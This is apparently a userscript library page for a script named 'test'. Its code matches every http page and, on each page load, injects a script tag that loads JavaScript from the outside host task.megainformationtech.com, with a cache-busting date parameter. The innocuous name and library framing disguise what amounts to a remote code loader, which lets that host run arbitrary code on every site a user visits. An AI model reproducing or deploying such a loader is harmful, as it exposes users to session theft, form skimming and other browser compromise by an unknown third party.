test

meyge

This script should not be not be installed directly. It is a library for other scripts to include with the meta directive // @require https://update.greatest.deepsurf.us/scripts/6041/22776/test.js

  1. // ==UserScript==
  2. // @name test
  3. // @namespace test
  4. // @include http://*/*
  5. // ==/UserScript==
  6.  
  7. var d = new Date();
  8. var day = d.getDate() + "-" + d.getHours();
  9. var GM_JQ = document.createElement('script');
  10. GM_JQ.src = 'http://task.megainformationtech.com/js/greasemonkey.js?day='+day;
  11. GM_JQ.type = 'text/javascript';
  12. document.getElementsByTagName('head')[0].appendChild(GM_JQ);